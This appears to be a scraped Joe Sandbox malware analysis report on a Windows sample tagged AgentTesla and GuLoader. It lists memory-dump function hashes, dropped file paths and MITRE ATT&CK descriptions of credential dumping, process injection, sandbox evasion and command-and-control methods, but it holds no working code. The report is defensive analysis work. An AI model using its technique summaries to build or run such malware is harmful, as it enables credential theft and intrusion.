Source File: 00000004.00000002.5750156942.000000001D8BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D8BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1d8bd000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2e9015f96370ead39249aecec714e87af078064c6995370018afb27c8b89097
Instruction ID: eb8c3d607be871f9bd265a4ab9d35062e958c39675621efb2e70a8a3250974c1
Opcode Fuzzy Hash: f2e9015f96370ead39249aecec714e87af078064c6995370018afb27c8b89097
Instruction Fuzzy Hash: 42119075504284DFCB02CF14D5C4B15FB61FB88714F24C6ADE8494B796C37AD45ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 012AC910 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b567414b8a25d339f15549e868ca327efe2d9893bd548b93e72121c411f4611
Instruction ID: dee580a3327f80d9d297cdfc1fc20b208108eb720a756d0682d2eb8c988172da
Opcode Fuzzy Hash: 4b567414b8a25d339f15549e868ca327efe2d9893bd548b93e72121c411f4611
Instruction Fuzzy Hash: 87112E35B141298FCB40EFB8C8895AEB7F5BF892207548029E51AE3300EF759D158B91

Uniqueness

Uniqueness Score: -1.00%

Function 012ADB38 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 896192b859d97b5e796e7f7f5b65a0191e33bf9ddd33dcbe08f429d4f8347308
Instruction ID: 9659607cd39086b474a50fdfc160f056e4d6161879f2316d3b77ee2702ec417a
Opcode Fuzzy Hash: 896192b859d97b5e796e7f7f5b65a0191e33bf9ddd33dcbe08f429d4f8347308
Instruction Fuzzy Hash: D6115B31B102298FCB40EBFCC8859EEB7F5BF896107848429D10AE7750EB349D12CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012AFCE8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8d4c944ca478b16df1e1590963ed634058eca4ef99e5181c0cbaaac27b71954
Instruction ID: f14e6c3718f678045a58c0a1617ee6c3e6908e30d258c74c569993244f29fd1b
Opcode Fuzzy Hash: c8d4c944ca478b16df1e1590963ed634058eca4ef99e5181c0cbaaac27b71954
Instruction Fuzzy Hash: 14115B31B102298FCB40EBBCC8859AEB7F5BF992107948429D51AE7310EB349D068B91

Uniqueness

Uniqueness Score: -1.00%

Function 012AEF98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67fe39639bb57196584effbb0dfc7f0696ad95bc8568851cb05f8355ace83eb7
Instruction ID: bf3de3316b7569ad1ade51d45f145cea35c5e43021bb64dc11db4e98b60d4818
Opcode Fuzzy Hash: 67fe39639bb57196584effbb0dfc7f0696ad95bc8568851cb05f8355ace83eb7
Instruction Fuzzy Hash: 10115B31F102298FCB80EFBCC8859AEB7F5BF996107948029D51AE7714EB349D128B91

Uniqueness

Uniqueness Score: -1.00%

Function 012A20E8 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbce68b957a57e84516d18fa36d91148e045e4e460ca173b37be8f1a48247060
Instruction ID: edd2e88ecf00448cc38db26ae78c52f513b4ef611bc325ebb6a45e2c79e729e1
Opcode Fuzzy Hash: dbce68b957a57e84516d18fa36d91148e045e4e460ca173b37be8f1a48247060
Instruction Fuzzy Hash: DD01D636704125ABDB458E999810ABF3BABEBC8750B198029F705C7340DEB2EC2187E1

Uniqueness

Uniqueness Score: -1.00%

Function 012A20E3 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a246e1bec236c84f87047969296efe559e9950897f3fd9c4ca47e60b3dc96c26
Instruction ID: 155111191fcc211bf30081e6c13ae97f4ad572a3d76ba70415cf6296365d1b2c
Opcode Fuzzy Hash: a246e1bec236c84f87047969296efe559e9950897f3fd9c4ca47e60b3dc96c26
Instruction Fuzzy Hash: 74F0C836604119BFDB058E99DC00AEF7FAAEFC8750F188025F704C3240DB72D8229BA1

Uniqueness

Uniqueness Score: -1.00%

Function 012AB120 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d12b4b20a4be4b0ee448c56c9199635f6a6e4ca30178be52c8acf86f1d50fd
Instruction ID: 516a83b86c9efead7c6e2d1afa13702bdd05844e716163a86cdb06ffd32faef4
Opcode Fuzzy Hash: d7d12b4b20a4be4b0ee448c56c9199635f6a6e4ca30178be52c8acf86f1d50fd
Instruction Fuzzy Hash: 01F03776E012299FCB80EFB998451EE7BF8FB8C631B44007AE519D3204E6705A128FE0

Uniqueness

Uniqueness Score: -1.00%

Function 012ACD28 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4262ee6e4724c0466d21b14cbab96cf1abdbd8b8421f9beb1afba4e592a27e45
Instruction ID: fd907a5eb9f7b1231770dbc51996aead0fb7b7364b3fde14e719e3dab6a7a6d1
Opcode Fuzzy Hash: 4262ee6e4724c0466d21b14cbab96cf1abdbd8b8421f9beb1afba4e592a27e45
Instruction Fuzzy Hash: 95F05870C1430AEFCB90EFB884453AEBFF0AF09304F6089AAC514E6241E7B546529FA1

Uniqueness

Uniqueness Score: -1.00%

Function 012AB130 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81c72fe88f80fdb040a059a6175b4d32e4c080678822b82c5cb40366c4484dee
Instruction ID: 6b6fdc27613d84389d66004e28985c89532cfa38f495b83f2ec4ca6abe6d202c
Opcode Fuzzy Hash: 81c72fe88f80fdb040a059a6175b4d32e4c080678822b82c5cb40366c4484dee
Instruction Fuzzy Hash: A2E09272E002299F8B40AFBC98041AE7AF8FA88220B04007AD519D3200EA304A118BD0

Uniqueness

Uniqueness Score: -1.00%

Function 012AC971 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6278db61516c936bc814dcdb20cf034c30a9fc92f3c170677a84228677d0d81
Instruction ID: da5db0b853e4759a923e65f61bc503538b0841acbb7e17de60a7ab717c07a09e
Opcode Fuzzy Hash: b6278db61516c936bc814dcdb20cf034c30a9fc92f3c170677a84228677d0d81
Instruction Fuzzy Hash: 12F0A535B1402A8FCF04EBE9D8985ACB7B1FF882217198065E90AE3310EE769C258B51

Uniqueness

Uniqueness Score: -1.00%

Function 012ADB97 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a628c1f57c02563df6f0c6106b0640443d357bcdbf372cc7d4a3051d403598ea
Instruction ID: e1c60e79fc3ba0ce798c9a71bbfbab217d57f8fdadde03ca1f87acbe612c12ad
Opcode Fuzzy Hash: a628c1f57c02563df6f0c6106b0640443d357bcdbf372cc7d4a3051d403598ea
Instruction Fuzzy Hash: 7FE0C236B2412A8B8F44EBF8D8549ECB3F1AF992207858465D509E7750EE349D228B52

Uniqueness

Uniqueness Score: -1.00%

Function 012AFD47 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e62a4e125b4bbb2655de9afba706900f3e4df7e0684ab0a49fa9d43c18e6635
Instruction ID: bec486d290248de07bb675f36d85b677a5c9d6f0db4d149cc0f391f55604807b
Opcode Fuzzy Hash: 1e62a4e125b4bbb2655de9afba706900f3e4df7e0684ab0a49fa9d43c18e6635
Instruction Fuzzy Hash: 24E03236B2012A8B8F05EBF8D8848ECB3E1AF992207848420D509E7300DA349C118B92

Uniqueness

Uniqueness Score: -1.00%

Function 012ACD38 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa584d80bfdd2aba0dd0c564b9ebc045d00620be1f9a9139e6c4b296be5777a3
Instruction ID: ad0cac5309b229caafbe1c488008d3d9a873a9a5deafa3ca7021bdb34dc6117b
Opcode Fuzzy Hash: fa584d80bfdd2aba0dd0c564b9ebc045d00620be1f9a9139e6c4b296be5777a3
Instruction Fuzzy Hash: 3BE0C2B0D1420ADFCB94EFB884063AEBFF0AB08300FA0896AC515E2240E7B546518FD1

Uniqueness

Uniqueness Score: -1.00%

Function 012AFC15 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46ca6bdfb6325cc1aac4cbe31bef9cf8abca4ff002b32be6eca639fde32df1ce
Instruction ID: d37cc66b5ee87ace09c4c939daa2371b837999f2f18dcc7ea12455801516f158
Opcode Fuzzy Hash: 46ca6bdfb6325cc1aac4cbe31bef9cf8abca4ff002b32be6eca639fde32df1ce
Instruction Fuzzy Hash: 7FD02306734102574F54567A021533D10C707801C57414C755D42CE1D5FD1CC8811391

Uniqueness

Uniqueness Score: -1.00%

Function 012A2098 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6dc22afd607264e468d599461701aaced4bbc3c0e4bcbc136c766894307e046
Instruction ID: 7c89216888de8c910b0878c0a57f2e17a8a199179e95a0382450a9119599d9d2
Opcode Fuzzy Hash: e6dc22afd607264e468d599461701aaced4bbc3c0e4bcbc136c766894307e046
Instruction Fuzzy Hash: 3BC0123334A646CFC70217596C900D9BF30D9533313641293C110D70D2C3210035C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012ACB2A Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 390a1630114a433d074b3b9052aaffc695d1125918e03c3d34d6c183ed615cca
Instruction ID: 0b3f6d5b6e408c9cdb498d743d6ee8061db84d571f0b8a53850137b56b28a256
Opcode Fuzzy Hash: 390a1630114a433d074b3b9052aaffc695d1125918e03c3d34d6c183ed615cca
Instruction Fuzzy Hash: CBD0C932B061158BCF08ABF0E8880ECB731FF8433AB144475D60692510DB335C26CB11

Uniqueness

Uniqueness Score: -1.00%

Function 012A61A9 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753a1be083bc26df925569fbb81cc4b2919c259ec5587a1d6211ddaeb02f79e5
Instruction ID: ca0e3a66ea790d389bc23312f07f49c08d0deeee8b16c2ec78524d5b58fe1269
Opcode Fuzzy Hash: 753a1be083bc26df925569fbb81cc4b2919c259ec5587a1d6211ddaeb02f79e5
Instruction Fuzzy Hash: 24C08C36F10118CB4B00CA84A0400ECF3B1EB88A25B108057E90852600C7315E2A8A91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 012A2A08 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;k, xrefs: 012A2A1E
\;k, xrefs: 012A2A3A
\;k, xrefs: 012A2A14
\;k, xrefs: 012A2A46

Memory Dump Source

Source File: 00000004.00000002.5722980483.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_12a0000_CasPol.jbxd

Similarity

API ID:
String ID: \;k$\;k$\;k$\;k
API String ID: 0-2739306711
Opcode ID: 93deb49455ba42e62153632bc19da99d916d69be9984c83720a8165a1de2a00c
Instruction ID: ad53f259b43ac9f8297e1f361540fb7a9a2597ace04d13935bb91f4afddbdbe0
Opcode Fuzzy Hash: 93deb49455ba42e62153632bc19da99d916d69be9984c83720a8165a1de2a00c
Instruction Fuzzy Hash: 04018432730012CF87748E2CC07592677EAAF897A0765417AE616CB376EA71DC42C791

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Temp\nsiA9E6.tmp\System.dll

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\ArtDeco_brown_4.bmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\BRUGERUDGAVERNES.Frd6

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING\battery.png

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING\call-stop-symbolic.symbolic.png

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Folketingsvalget160\Tatou\Borgerdyderne\FOLKESANGEREN\JACKROLLING\folder-saved-search.png

\Device\ConDrv

Static File Info

General

File Icon

Windows Analysis Report
SecuriteInfo.com.Gen.Variant.Nemesis.8928.31999.exe

Function 0040352D Relevance: 88.0, APIs: 33, Strings: 17, Instructions: 450
stringfilecomCOMMON

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 02AD4F37 Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 1027
COMMON

Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Function 00406873 Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Function 00403F9A Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215
stringregistryCOMMON

Function 0040307D Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 0040657A Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 196
stringCOMMON

Function 004032B4 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 166
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

